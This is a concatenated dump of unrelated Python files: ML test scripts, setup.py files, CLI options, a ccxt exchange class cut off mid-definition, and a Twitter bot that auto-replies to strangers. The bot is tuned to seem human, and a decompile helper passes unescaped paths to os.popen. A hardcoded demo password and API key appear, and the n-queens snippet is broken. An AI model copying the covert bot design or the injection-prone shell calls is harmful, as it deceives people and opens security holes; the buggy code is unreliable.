References the column which generates the unique keys of this sub-total (groupby).
""")
aggregators = List(Instance(RowAggregator), help="""
Describes how to aggregate the columns which will populate this sub-total.
""")
collapsed = Bool(False, help="""
Whether the corresponding sub-total is expanded or collapsed by default.
""")
class DataCube(DataTable):
'''Specialized DataTable with collapsing groups, totals, and sub-totals.
'''
grouping = List(Instance(GroupingInfo), help="""
Describe what aggregation operations used to define sub-totals and totals
""")
target = Instance(DataSource, help="""
Two column datasource (row_indices & labels) describing which rows of the
data cubes are expanded or collapsed
""")
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
|
py | b404087f9dad3a2f19d68ad79079471f00f00a9b | import argparse
import os
import warnings
import mmcv
import torch
from mmcv import Config, DictAction
from mmcv.cnn import fuse_conv_bn
from mmcv.parallel import MMDataParallel, MMDistributedDataParallel
from mmcv.runner import (get_dist_info, init_dist, load_checkpoint,
wrap_fp16_model)
from mmdet.apis import multi_gpu_test, single_gpu_test
from mmdet.datasets import (build_dataloader, build_dataset,
replace_ImageToTensor)
from mmdet.models import build_detector
def parse_args():
parser = argparse.ArgumentParser(
description='MMDet test (and eval) a model')
parser.add_argument('config', help='test config file path')
parser.add_argument('checkpoint', default='/data_raid5_21T/zgh/ZGh/work_dirs/cascade_r2_3/latest.pth' , help='checkpoint file')
parser.add_argument('--out', help='output result file in pickle format')
parser.add_argument(
'--fuse-conv-bn',
action='store_true',
help='Whether to fuse conv and bn, this will slightly increase'
'the inference speed')
parser.add_argument(
'--format-only',
action='store_true',
help='Format the output results without perform evaluation. It is'
'useful when you want to format the result to a specific format and '
'submit it to the test server')
parser.add_argument(
'--eval',
type=str,
nargs='+',
help='evaluation metrics, which depends on the dataset, e.g., "bbox",'
' "segm", "proposal" for COCO, and "mAP", "recall" for PASCAL VOC')
parser.add_argument('--show', action='store_true', help='show results')
parser.add_argument(
'--show-dir', help='directory where painted images will be saved')
parser.add_argument(
'--show-score-thr',
type=float,
default=0.3,
help='score threshold (default: 0.3)')
parser.add_argument(
'--gpu-collect',
action='store_true',
help='whether to use gpu to collect results.')
parser.add_argument(
'--tmpdir',
help='tmp directory used for collecting results from multiple '
'workers, available when gpu-collect is not specified')
parser.add_argument(
'--cfg-options',
nargs='+',
action=DictAction,
help='override some settings in the used config, the key-value pair '
'in xxx=yyy format will be merged into config file. If the value to '
'be overwritten is a list, it should be like key="[a,b]" or key=a,b '
'It also allows nested list/tuple values, e.g. key="[(a,b),(c,d)]" '
'Note that the quotation marks are necessary and that no white space '
'is allowed.')
parser.add_argument(
'--options',
nargs='+',
action=DictAction,
help='custom options for evaluation, the key-value pair in xxx=yyy '
'format will be kwargs for dataset.evaluate() function (deprecate), '
'change to --eval-options instead.')
parser.add_argument(
'--eval-options',
nargs='+',
action=DictAction,
help='custom options for evaluation, the key-value pair in xxx=yyy '
'format will be kwargs for dataset.evaluate() function')
parser.add_argument(
'--launcher',
choices=['none', 'pytorch', 'slurm', 'mpi'],
default='none',
help='job launcher')
parser.add_argument('--local_rank', type=int, default=0)
args = parser.parse_args()
if 'LOCAL_RANK' not in os.environ:
os.environ['LOCAL_RANK'] = str(args.local_rank)
if args.options and args.eval_options:
raise ValueError(
'--options and --eval-options cannot be both '
'specified, --options is deprecated in favor of --eval-options')
if args.options:
warnings.warn('--options is deprecated in favor of --eval-options')
args.eval_options = args.options
return args
def main():
args = parse_args()
assert args.out or args.eval or args.format_only or args.show \
or args.show_dir, \
('Please specify at least one operation (save/eval/format/show the '
'results / save the results) with the argument "--out", "--eval"'
', "--format-only", "--show" or "--show-dir"')
if args.eval and args.format_only:
raise ValueError('--eval and --format_only cannot be both specified')
if args.out is not None and not args.out.endswith(('.pkl', '.pickle')):
raise ValueError('The output file must be a pkl file.')
cfg = Config.fromfile(args.config)
if args.cfg_options is not None:
cfg.merge_from_dict(args.cfg_options)
# import modules from string list.
if cfg.get('custom_imports', None):
from mmcv.utils import import_modules_from_strings
import_modules_from_strings(**cfg['custom_imports'])
# set cudnn_benchmark
if cfg.get('cudnn_benchmark', False):
torch.backends.cudnn.benchmark = True
cfg.model.pretrained = None
if cfg.model.get('neck'):
if isinstance(cfg.model.neck, list):
for neck_cfg in cfg.model.neck:
if neck_cfg.get('rfp_backbone'):
if neck_cfg.rfp_backbone.get('pretrained'):
neck_cfg.rfp_backbone.pretrained = None
elif cfg.model.neck.get('rfp_backbone'):
if cfg.model.neck.rfp_backbone.get('pretrained'):
cfg.model.neck.rfp_backbone.pretrained = None
# in case the test dataset is concatenated
samples_per_gpu = 1
if isinstance(cfg.data.test, dict):
cfg.data.test.test_mode = True
samples_per_gpu = cfg.data.test.pop('samples_per_gpu', 1)
if samples_per_gpu > 1:
# Replace 'ImageToTensor' to 'DefaultFormatBundle'
cfg.data.test.pipeline = replace_ImageToTensor(
cfg.data.test.pipeline)
elif isinstance(cfg.data.test, list):
for ds_cfg in cfg.data.test:
ds_cfg.test_mode = True
samples_per_gpu = max(
[ds_cfg.pop('samples_per_gpu', 1) for ds_cfg in cfg.data.test])
if samples_per_gpu > 1:
for ds_cfg in cfg.data.test:
ds_cfg.pipeline = replace_ImageToTensor(ds_cfg.pipeline)
# init distributed env first, since logger depends on the dist info.
if args.launcher == 'none':
distributed = False
else:
distributed = True
init_dist(args.launcher, **cfg.dist_params)
# build the dataloader
dataset = build_dataset(cfg.data.test)
data_loader = build_dataloader(
dataset,
samples_per_gpu=samples_per_gpu,
workers_per_gpu=cfg.data.workers_per_gpu,
dist=distributed,
shuffle=False)
# build the model and load checkpoint
cfg.model.train_cfg = None
model = build_detector(cfg.model, test_cfg=cfg.get('test_cfg'))
fp16_cfg = cfg.get('fp16', None)
if fp16_cfg is not None:
wrap_fp16_model(model)
checkpoint = load_checkpoint(model, args.checkpoint, map_location='cpu')
if args.fuse_conv_bn:
model = fuse_conv_bn(model)
# old versions did not save class info in checkpoints, this walkaround is
# for backward compatibility
if 'CLASSES' in checkpoint['meta']:
model.CLASSES = checkpoint['meta']['CLASSES']
else:
model.CLASSES = dataset.CLASSES
if not distributed:
model = MMDataParallel(model, device_ids=[0])
outputs = single_gpu_test(model, data_loader, args.show, args.show_dir,
args.show_score_thr)
else:
model = MMDistributedDataParallel(
model.cuda(),
device_ids=[torch.cuda.current_device()],
broadcast_buffers=False)
outputs = multi_gpu_test(model, data_loader, args.tmpdir,
args.gpu_collect)
rank, _ = get_dist_info()
if rank == 0:
if args.out:
print(f'\nwriting results to {args.out}')
mmcv.dump(outputs, args.out)
kwargs = {} if args.eval_options is None else args.eval_options
if args.format_only:
dataset.format_results(outputs, **kwargs)
if args.eval:
eval_kwargs = cfg.get('evaluation', {}).copy()
# hard-code way to remove EvalHook args
for key in [
'interval', 'tmpdir', 'start', 'gpu_collect', 'save_best',
'rule'
]:
eval_kwargs.pop(key, None)
eval_kwargs.update(dict(metric=args.eval, **kwargs))
print(dataset.evaluate(outputs, **eval_kwargs))
if __name__ == '__main__':
main()
|
py | b40408890548046c865134607eff3304bfff8c33 | # import the similarity analyzer class
from similarity_analyzer import SimilarityAnalyzer
# import datetime for the timestamp in response checked queue
from datetime import datetime, timedelta
# import time to be able to sleep
import time
# import twythonaccess to be able to send tweets
import twythonaccess
# import setup to be able to read the persona
import setup
# import error messenger
from error_messenger import send_error_message
# The Coordinate class will coordinate all actions (wow so much info)
# It will be concurrently accessed at four different threads
# Each of its methods will only be accessed at one thread at a time
# The communication between threads is made via the class' properties (e.g. the tweet lists)
class Coordinator():
# The queue of tweets to be analyzed for similarity
# This should always be kept under, say, 100 elements
# The above measure is to ensure the waiting time for similarity analysis is short,
# i.e. we don't want a bottle neck waiting for similarity analysis
similarity_analyzer_queue = []
# The queue of tweets to be sent
# This should be kept under, say, 2 elements
# This is to ensure the response isn't all too delayed, but still somewhat delayed
# The data is a tuple, on the following form: (reply_text, base_tweet, similarity_ratio)
send_tweet_queue = []
# The queue of tweets to be response checked
# It takes around 1 minute to process each tweet
# And a waiting time of around 5 hours should be suitable
# Thus, the limit to this queue should be 300 elements
# The elements are constituted by a tuple: (timestamp, tweet)
# They should not be processed if less than 2 hours have passed
response_checker_queue = []
# The threshold for sending a tweet should initially be set to 0.5
# The threshold is increased whenever a match is made, and vice versa
# Thus, the bot will only get more accurate over time
similarity_threshold = 0.5
# Getting new tweets from streamer
# Just add them to the similarity queue, after filtering out some tweets
def new_tweet(self, tweet):
# filter out retweets
if tweet["text"].startswith("RT"):
return
if "retweeted_status" in tweet:
return
# don't reply to replies – they have too much context going on
if tweet["in_reply_to_status_id"] != None:
return
# if the user is protected, then return
if tweet["user"]["protected"]:
return
# filter out tweets containing urls – once again, we don't really know what's going on
if tweet["entities"]["urls"]:
return
# add to the similarity analyzer queue, if its length is less than 100 elements
if len(self.similarity_analyzer_queue) < 100:
print("new tweet: " + tweet["text"])
self.similarity_analyzer_queue.append(tweet)
# The last sent response, to not send the same response twice
last_sent_response = ""
# This loop is run in its own thread, indefinitely
# It takes the first element from the queue, analyzes it,
# and appends to both the send tweet list and the response checker list
def similarity_analysis_loop(self):
# add error handling
while True:
try:
# sleep for periods of 10 seconds until there is a tweet in the queue
while len(self.similarity_analyzer_queue) == 0:
time.sleep(10)
# Take the first element from the similarity analyzer queue
tweet = self.similarity_analyzer_queue.pop(0)
# analyze the tweet
# the analyzer will return the best match tweet text, along with the similarity ratio between the tweet and its match
# the max length of the response text has to be 140 - 1 - length of screen name - 1, for the "@screen_name " prefix
best_match_response, similarity_ratio = self.similarity_analyzer.analyze_tweet(tweet["text"], max_length = 138 - len(tweet["user"]["screen_name"]))
print("found similar response with similarity ratio of " + str(similarity_ratio) + ": " + best_match_response)
# check if the similarity ratio is greater than or equal to the threshold, or not
if similarity_ratio >= self.similarity_threshold:
if self.last_sent_response != best_match_response:
# yay, we can send this tweet
# the send tweet queue should never be longer than 1 element
if len(self.send_tweet_queue) < 1:
self.send_tweet_queue.append((best_match_response, tweet, similarity_ratio))
else:
# if any tweet has a ratio lower than the current threshold,
# then replace that tweet with this one
# this means that even though this similarity ratio may be higher than any similarity ratio in the send tweet queue,
# don't replace them if they are not beneath the threshold. this is for more unpredictability, and more humanness.
# if this ratio is greater than the to be sent one, but less than 0.7, then exchange them. NOPE
for index, (to_be_sent_response, to_be_sent_to_tweet, to_be_sent_ratio) in enumerate(self.send_tweet_queue):
if to_be_sent_ratio < self.similarity_threshold:
self.send_tweet_queue[index] = (best_match_response, tweet, similarity_ratio)
break
# Increase the threshold, in an effort to increase the accuracy of the tweets
# Increase it by 0.01 (if smaller than 0.9)
self.similarity_threshold = min(0.9, self.similarity_threshold + 0.01)
else:
# Decrease the threshold, so as to be able to finally send some tweets
# Never go below 0.2
self.similarity_threshold = max(0.2, self.similarity_threshold - 0.01)
print("new threshold: " + str(self.similarity_threshold))
# if the response checked queue has fewer than 300 elements, add this tweet, along with the current timestamp
if len(self.response_checker_queue) < 300:
self.response_checker_queue.append((datetime.utcnow(), tweet))
except Exception as exception:
# print the exception and then sleep for 2 hours
# the sleep will reset all rate limiting
print(exception)
print("will sleep for 2 hours to avoid exception in similarity analysis loop")
send_error_message(exception, "similarity_analysis_loop")
time.sleep(2 * 60 * 60)
print("finished sleep after exception in similarity analysis loop. will now start anew")
# This function should run in its own thread, indefinitely
# It gets tweets from the queue, and processes them to find the best response
# If a good enough response is found, then the response and the base tweet is appended to the responses.txt
def response_checker_loop(self):
while True:
try:
# wait until there is a tweet in the queue
while len(self.response_checker_queue) == 0:
time.sleep(10)
# take the first element
# it is a tuple, formatted (timestamp, tweet)
timestamp, tweet = self.response_checker_queue.pop(0)
# sleep until two hours since the tweet was sent have passed
time.sleep(max(0, (timestamp + timedelta(hours=2) - datetime.utcnow()).total_seconds()))
print("response checking tweet: " + tweet["text"])
# great
# now, lets find the replies
# 180 calls like this one are allowed per 15 minute window
possible_replies = twythonaccess.authorize(twitter_app = twythonaccess.TwitterApp.response_checker).search(q = "@" + tweet["user"]["screen_name"], count = 100, result_type = "recent", since_id = tweet["id"], include_entities = False)["statuses"]
# now go through each reply, and find real replies
real_replies = []
for possible_reply in possible_replies:
if possible_reply["in_reply_to_status_id"] == tweet["id"]:
# yay, we found a real reply
real_replies.append(possible_reply)
if not real_replies:
# well, to spare any api calls, simply return prematurely here
# wait for 8 seconds to satisfy api limits on search
time.sleep(8)
continue
# now that we (potentially) have the real replies, find the best one
# initialize it with None, because we might not find a suitable reply
best_reply = None
if setup.FAVOR_RESPONSES_LIKED_BY_THE_RESPONDEE:
# just choose the first tweet that seems to be liked by the respondee
# first get the 200 most recently liked tweets by the respondee
# this api call is rate limited at once per minute
recently_liked = twythonaccess.authorize(twythonaccess.TwitterApp.response_checker).get_favorites(user_id = tweet["user"]["id"], count = 200, since_id = tweet["id"], include_entities = False)
# now, we just have to check whether any of these tweets coincide with a tweet in the real_replies
for real_reply in real_replies:
for liked in recently_liked:
if real_reply["id"] == liked["id"]:
# yay! we found a reply that was liked by the original tweet author
# if the user has liked many replies, we don't care about that
best_reply = real_reply
break
else:
continue
break
else:
# determine the tweet to add based on the like and retweet count
best_reply_like_and_retweet_count = 0
for real_reply in real_replies:
super_count = real_reply["favorite_count"] + real_reply["retweet_count"]
if super_count > best_reply_like_and_retweet_count:
best_reply = real_reply
best_reply_like_and_retweet_count = super_count
# check whether the best reply is a tweet or not
if best_reply != None:
print("did find best reply: " + best_reply["text"])
# yay, we have a decent reply!
reply_text = best_reply["text"]
base_text = tweet["text"]
# now, remove the mentions at the start of the reply text
while reply_text.startswith("@"):
# remove the first word
reply_text = reply_text.split(" ", 1)[1]
# encode all newlines as explcitly written newlines, so that the tweets fit on one line each
reply_text = reply_text.replace("\n", "\\n")
base_text = base_text.replace("\n", "\\n")
# now, append the reply text and the base text to the responses.txt file
# the reply text should be written first, and the base text afterwards
# we assume that the responses.txt file is correctly formatted (i.e. preserving the always-even-lines invariant)
with open("responses.txt", "a") as responses_file:
responses_file.write(reply_text + "\n")
responses_file.write(base_text + "\n")
# now, sleep for 70 seconds (to avoid rate limiting on get_favorites)
time.sleep(70)
except Exception as exception:
print("oh, some error in response checker loop")
print(exception)
send_error_message(exception, "response_checker_loop")
print("will wait for 2 hours")
time.sleep(2 * 60 * 60)
print("has slept in response checker loop, will now start anew")
# This function is run in its own thread, indefinitely
# It takes tweets from the send_tweet_queue, and sends them
# It waits for 1 minute between each sent tweet, in an effort not to get rate limited
# Apparently, 1 minute is too short a wait
# Twitter has no strict rules on this, but try 15 minutes
# 10 minutes do not work
def send_tweet_loop(self):
while True:
try:
# sleep until there is a tweet in the queue
while len(self.send_tweet_queue) == 0:
time.sleep(30)
# take the first element
# it is a tuple, as defined above
reply_text, base_tweet, similarity_ratio = self.send_tweet_queue.pop(0)
self.last_sent_response = reply_text
# add @screen_name to the reply text
reply_text = "@" + base_tweet["user"]["screen_name"] + " " + reply_text
# send the tweet
twythonaccess.send_tweet(reply_text, twitter_app = twythonaccess.TwitterApp.send_tweet, in_reply_to_status_id = base_tweet["id"])
# sleep for 15 minutes
time.sleep(15 * 60)
except Exception as exception:
print("oh, some error in send tweet loop")
print(exception)
print("will wait for 2 hours")
send_error_message(exception, "send_tweet_loop")
time.sleep(2 * 60 * 60)
print("has slept in send tweet loop, will now start anew")
|
py | b40408c4634d44be6f4f38e70d996be3fc76f64e | from django.core.management.base import BaseCommand
from django.db import transaction
from posthog.demo import ORGANIZATION_NAME, TEAM_NAME, create_demo_data
from posthog.models import PersonalAPIKey, User
from posthog.models.event_definition import EventDefinition
from posthog.models.property_definition import PropertyDefinition
class Command(BaseCommand):
help = "Set up the instance for development/review with demo data"
def add_arguments(self, parser):
parser.add_argument(
"--no-data", action="store_true", help="Create demo account without data",
)
def handle(self, *args, **options):
with transaction.atomic():
_, team, user = User.objects.bootstrap(
organization_name=ORGANIZATION_NAME,
email="[email protected]",
password="12345678",
first_name="Jane Doe",
is_staff=True,
team_fields={
"name": TEAM_NAME,
"api_token": "e2e_token_1239",
"completed_snippet_onboarding": True,
"ingested_event": True,
"event_names": ["$pageview", "$autocapture"],
"event_properties": ["$current_url", "$browser", "$os"],
},
)
EventDefinition.objects.create(team=team, name="$pageview")
EventDefinition.objects.create(team=team, name="$autocapture")
PropertyDefinition.objects.create(team=team, name="$current_url")
PropertyDefinition.objects.create(team=team, name="$browser")
PropertyDefinition.objects.create(team=team, name="$os")
PropertyDefinition.objects.create(team=team, name="usage_count", is_numerical=True)
PropertyDefinition.objects.create(team=team, name="volume", is_numerical=True)
PropertyDefinition.objects.create(team=team, name="is_first_movie")
PersonalAPIKey.objects.create(user=user, label="e2e_demo_api_key key", value="e2e_demo_api_key")
if not options["no_data"]:
create_demo_data(team)
|
py | b40409f658f14173442ffc1364b08c31292fb818 | #! /usr/bin/env python
#
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
from ginga.version import version
import os
srcdir = os.path.dirname(__file__)
from distutils.command.build_py import build_py
def read(fname):
buf = open(os.path.join(srcdir, fname), 'r').read()
return buf
# not yet working...
def get_docs():
docdir = os.path.join(srcdir, 'doc')
res = []
# ['../../doc/Makefile', 'doc/conf.py', 'doc/*.rst',
# 'doc/manual/*.rst', 'doc/figures/*.png']
return res
setup(
name = "ginga",
version = version,
author = "Eric Jeschke",
author_email = "[email protected]",
description = ("An astronomical image viewer and toolkit."),
long_description = read('README.txt'),
license = "BSD",
keywords = "FITS image viewer astronomy",
url = "http://ejeschke.github.com/ginga",
packages = ['ginga',
# Gtk version
'ginga.cairow', 'ginga.gtkw', 'ginga.gtkw.plugins',
'ginga.gtkw.tests',
# Qt version
'ginga.qtw', 'ginga.qtw.plugins', 'ginga.qtw.tests',
# Tk version
'ginga.tkw',
# Matplotlib version
'ginga.mplw',
# aggdraw backend
'ginga.aggw',
# OpenCv backend
'ginga.cvw',
# Mock version
'ginga.mockw',
# Web stuff
'ginga.web', 'ginga.web.pgw',
'ginga.web.pgw.js', 'ginga.web.pgw.templates',
# Common stuff
'ginga.misc', 'ginga.misc.plugins', 'ginga.base',
'ginga.canvas', 'ginga.util',
# Misc
'ginga.icons', 'ginga.doc', 'ginga.tests',
],
package_data = { 'ginga.icons': ['*.ppm', '*.png'],
'ginga.gtkw': ['gtk_rc'],
#'ginga.doc': get_docs(),
'ginga.doc': ['manual/*.html'],
'ginga.web.pgw': ['templates/*.html', 'js/*.js'],
},
scripts = ['scripts/ginga', 'scripts/grc', 'scripts/gris'],
install_requires = ['numpy>=1.7'],
test_suite = "ginga.tests",
classifiers=[
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Programming Language :: C',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3',
'Topic :: Scientific/Engineering :: Astronomy',
'Topic :: Scientific/Engineering :: Physics',
],
cmdclass={'build_py': build_py}
)
|
py | b4040c1ef446fa7c825ec925cfb57f228c363261 | from typing import List
from constraint import *
problem = Problem()
numpieces = 4
rows = [1,2,3,4]
problem.addVariables([1,2,3,4], range(numpieces))
def not_same_column(x, y):
return x != y
def not_same_diagonal_downwards(row1, row2, colu1, colu2):
return row1-colu1 != row2-colu2
def not_same_diagonal_upwards(row1, row2, colu1, colu2):
print(str(row1) + " " + str(row2) + " " + str(colu1) + " " + str(colu2))
if row1-colu1 != row2-colu2:
print("Este si")
return True
else:
print("Este no")
return False
for f1 in rows:
for f2 in rows:
if f1 < f2:
problem.addConstraint(AllDifferentConstraint())
print(f1)
print(f2)
problem.addConstraint(not_same_diagonal_downwards, (rows[f1], rows[f2], f1, f2))
#problem.addConstraint(lambda row1, row2: not_same_diagonal_upwards(row1, row2, col1, col2), (col1, col2))
#problem.addConstraint(lambda row1, row2: row1 != row2,(col1, col2))
# problem.addConstraint(lambda row1, row2: (row1 - col1) != (row2 - col2),
# (col1, col2))
# problem.addConstraint(lambda row1, row2: (row1 - row2) != (col2 - col1),
# (col1, col2))
solutions = problem.getSolutions()
print(solutions)
|
py | b4040c952ac45ece967e50d379621a5f3e884094 | import unittest
from unittest.mock import patch
from src.weight.weight_calculator import handler
class CalculatorTests(unittest.TestCase):
@patch("src.weight.weight_calculator.LOGGER")
def test_success(self, mock_logger):
event = {
"queryStringParameters": {
"height": 180
}
}
response = handler(event, None)
self.assertEqual(200, response["statusCode"])
self.assertEqual("""{"weight": 80}""", response["body"])
mock_logger.info.assert_called_once_with("Some info message")
|
py | b4040d06558b8483134d9ca3f4c2ab385bbdc016 | # cligj
# Shared arguments and options.
import click
from .features import normalize_feature_inputs
# Arguments.
# Multiple input files.
files_in_arg = click.argument(
'files',
nargs=-1,
type=click.Path(resolve_path=True),
required=True,
metavar="INPUTS...")
# Multiple files, last of which is an output file.
files_inout_arg = click.argument(
'files',
nargs=-1,
type=click.Path(resolve_path=True),
required=True,
metavar="INPUTS... OUTPUT")
# Features from files, command line args, or stdin.
# Returns the input data as an iterable of GeoJSON Feature-like
# dictionaries.
features_in_arg = click.argument(
'features',
nargs=-1,
callback=normalize_feature_inputs,
metavar="FEATURES...")
# Options.
verbose_opt = click.option(
'--verbose', '-v',
count=True,
help="Increase verbosity.")
quiet_opt = click.option(
'--quiet', '-q',
count=True,
help="Decrease verbosity.")
# Format driver option.
format_opt = click.option(
'-f', '--format', '--driver', 'driver',
default='GTiff',
help="Output format driver")
# JSON formatting options.
indent_opt = click.option(
'--indent',
type=int,
default=None,
help="Indentation level for JSON output")
compact_opt = click.option(
'--compact/--not-compact',
default=False,
help="Use compact separators (',', ':').")
# Coordinate precision option.
precision_opt = click.option(
'--precision',
type=int,
default=-1,
help="Decimal precision of coordinates.")
# Geographic (default), projected, or Mercator switch.
projection_geographic_opt = click.option(
'--geographic',
'projection',
flag_value='geographic',
default=True,
help="Output in geographic coordinates (the default).")
projection_projected_opt = click.option(
'--projected',
'projection',
flag_value='projected',
help="Output in dataset's own, projected coordinates.")
projection_mercator_opt = click.option(
'--mercator',
'projection',
flag_value='mercator',
help="Output in Web Mercator coordinates.")
# Feature collection or feature sequence switch.
sequence_opt = click.option(
'--sequence/--no-sequence',
default=False,
help="Write a LF-delimited sequence of texts containing individual "
"objects or write a single JSON text containing a feature "
"collection object (the default).")
use_rs_opt = click.option(
'--rs/--no-rs',
'use_rs',
default=False,
help="Use RS (0x1E) as a prefix for individual texts in a sequence "
"as per http://tools.ietf.org/html/draft-ietf-json-text-sequence-13 "
"(default is False).")
# GeoJSON output mode option.
def geojson_type_collection_opt(default=False):
return click.option(
'--collection',
'geojson_type',
flag_value='collection',
default=default,
help="Output as GeoJSON feature collection(s).")
def geojson_type_feature_opt(default=False):
return click.option(
'--feature',
'geojson_type',
flag_value='feature',
default=default,
help="Output as GeoJSON feature(s).")
def geojson_type_bbox_opt(default=False):
return click.option(
'--bbox',
'geojson_type',
flag_value='bbox',
default=default,
help="Output as GeoJSON bounding box array(s).")
|
py | b4040f424cf983f14a7a21c68d225d65c6b46cee | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import os
import shutil
from lib_apk_shrink.model.DecompileConfig import DecompileConfig
__author__ = 'tiantong'
class JarDecompile(object):
decompile_config = DecompileConfig()
output_path_decompile = ""
output_path_out = ""
def __init__(self, decompileConfig=DecompileConfig()):
self.decompile_config = decompileConfig
def decompile_jar(self):
jad_path = self.decompile_config.jad_path
output_path = self.decompile_config.output_path
# 删除以前的文件夹
self.output_path_out = os.path.join(output_path, 'out')
self.output_path_decompile = os.path.join(output_path, 'decompile')
self.clearOutput();
# 确保文件夹存在
if not os.path.exists(self.output_path_out):
os.makedirs(self.output_path_out)
# 删除无用的 META-INF
META_path = os.path.join(self.output_path_out, 'META-INF')
# 解压jar
for jar_path in self.decompile_config.extra_jar:
command = 'unzip -o ' + jar_path + ' -d ' + self.output_path_out
result = os.popen(command).read()
self.delDir(META_path)
# 反编译
command = jad_path + ' -r -o -ff -d ' + self.output_path_decompile + ' -s java ' + self.output_path_out + '/**/*.class'
result = os.popen(command).read()
def delDir(self, dir):
if os.path.isdir(dir):
shutil.rmtree(dir)
def clearOutput(self):
self.delDir(self.output_path_decompile)
self.delDir(self.output_path_out)
|
py | b4040fe3da09aba4b4f5fb0341d3fb0dcd0a3f72 | import logging
import logging.config
from pathlib import Path
from utils.util import read_json
def setup_logging(save_dir, log_config='logger/logger_config.json', default_level=logging.INFO):
"""
设置日志配置
Setup logging configuration
:param save_dir: 日志保存目录
:param log_config: 日志配置文件路径
:param default_level: 默认日志等级
:return:
"""
# 解析配置文件路径
log_config = Path(log_config)
# 是个文件
if log_config.is_file():
# json.load解析
config = read_json(log_config)
# 找到并设置日志保存路径
for _, handler in config['handlers'].items():
if 'filename' in handler:
# 保存路径,文件名
handler['filename'] = str(save_dir / handler['filename'])
# config给logger
logging.config.dictConfig(config)
# 没找到
else:
print("Warning: logging configuration file is not found in {}.".format(log_config))
# 用默认配置,并info等级
logging.basicConfig(level=default_level)
|
py | b40410789d5945c77d455f51421257415aba7658 | # -*- coding: utf-8 -*-
__author__ = 'Samir Adrik'
__email__ = '[email protected]'
from distutils.core import setup
import sys
def get_version():
sys.path.insert(0, 'pyfiglet')
from source.version import __version__
sys.path.pop(0)
return __version__
setup(
name='normb',
version=get_version(),
packages=['tests', 'source', 'source.util', 'source.multivariate_norm', 'source.exceptions'],
requires=['numpy (>=1.15.4)', 'pandas (>=0.24.0)', 'PrettyTable (>=0.7.2)',
'pytest (>=4.0.2)', 'rpy2 (>=2.9.4)', 'scipy (>=1.2.1)'],
url='',
license='MIT',
author='samir',
author_email='[email protected]',
description='Battery of normality tests for numeric pandas.DataFrame'
)
|
py | b40410a18dfe9d2d587a0a1bc0028057713a952c | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async_support.base.exchange import Exchange
import hashlib
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import AccountSuspended
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import BadRequest
from ccxt.base.errors import BadSymbol
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidAddress
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import CancelPending
from ccxt.base.errors import NotSupported
from ccxt.base.errors import DDoSProtection
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.errors import OnMaintenance
from ccxt.base.errors import InvalidNonce
from ccxt.base.errors import RequestTimeout
from ccxt.base.decimal_to_precision import TICK_SIZE
from ccxt.base.precise import Precise
class okcoin(Exchange):
def describe(self):
return self.deep_extend(super(okcoin, self).describe(), {
'id': 'okcoin',
'name': 'OKCoin',
'countries': ['CN', 'US'],
'version': 'v3',
# cheapest endpoint is 100 requests per 2 seconds
# 50 requests per second => 1000 / 50 = 20ms
'rateLimit': 20,
'pro': True,
'has': {
'CORS': None,
'spot': True,
'margin': None,
'swap': None,
'future': True,
'option': None,
'cancelOrder': True,
'createOrder': True,
'fetchBalance': True,
'fetchClosedOrders': True,
'fetchCurrencies': True, # see below
'fetchDepositAddress': True,
'fetchDeposits': True,
'fetchLedger': True,
'fetchMarkets': True,
'fetchMyTrades': True,
'fetchOHLCV': True,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchOrders': None,
'fetchOrderTrades': True,
'fetchPosition': True,
'fetchPositions': True,
'fetchTicker': True,
'fetchTickers': True,
'fetchTime': True,
'fetchTrades': True,
'fetchTransactions': None,
'fetchWithdrawals': True,
'transfer': True,
'withdraw': True,
},
'timeframes': {
'1m': '60',
'3m': '180',
'5m': '300',
'15m': '900',
'30m': '1800',
'1h': '3600',
'2h': '7200',
'4h': '14400',
'6h': '21600',
'12h': '43200',
'1d': '86400',
'1w': '604800',
'1M': '2678400',
'3M': '8035200',
'6M': '16070400',
'1y': '31536000',
},
'hostname': 'okcoin.com',
'urls': {
'logo': 'https://user-images.githubusercontent.com/51840849/87295551-102fbf00-c50e-11ea-90a9-462eebba5829.jpg',
'api': {
'rest': 'https://www.{hostname}',
},
'www': 'https://www.okcoin.com',
'doc': 'https://www.okcoin.com/docs/en/',
'fees': 'https://www.okcoin.com/coin-fees',
'referral': 'https://www.okcoin.com/account/register?flag=activity&channelId=600001513',
'test': {
'rest': 'https://testnet.okex.com',
},
},
'api': {
'general': {
'get': {
'time': 8.3334,
},
},
'account': {
'get': {
'wallet': 8.3334,
'sub-account': 1000,
'asset-valuation': 1000,
'wallet/{currency}': 8.3334,
'withdrawal/history': 8.3334,
'withdrawal/history/{currency}': 8.3334,
'ledger': 5,
'deposit/address': 8.3334,
'deposit/history': 8.3334,
'deposit/history/{currency}': 8.3334,
'currencies': 8.3334,
'withdrawal/fee': 8.3334,
'deposit-lightning': 50,
'withdrawal-lightning': 50,
'fiat/deposit/detail': 5,
'fiat/deposit/details': 8.3334,
'fiat/withdraw/detail': 5,
'fiat/withdraw/details': 8.3334,
'fiat/channel': 8.3334,
},
'post': {
'transfer': 100, # 1 request per 2 seconds(per currency)
'withdrawal': 8.3334,
'fiat/cancel_deposit': 1,
'fiat/deposit': 8.3334,
'fiat/withdraw': 8.3334,
'fiat/cancel_withdrawal': 1,
},
},
# TODO fix signing issue in sign()
# all other endpoints of the format
# api/account/v3/wallet
# otc endpoints actually of the format: (exchanged places)
# api/v3/otc/rfq/instruments
'otc': {
'get': {
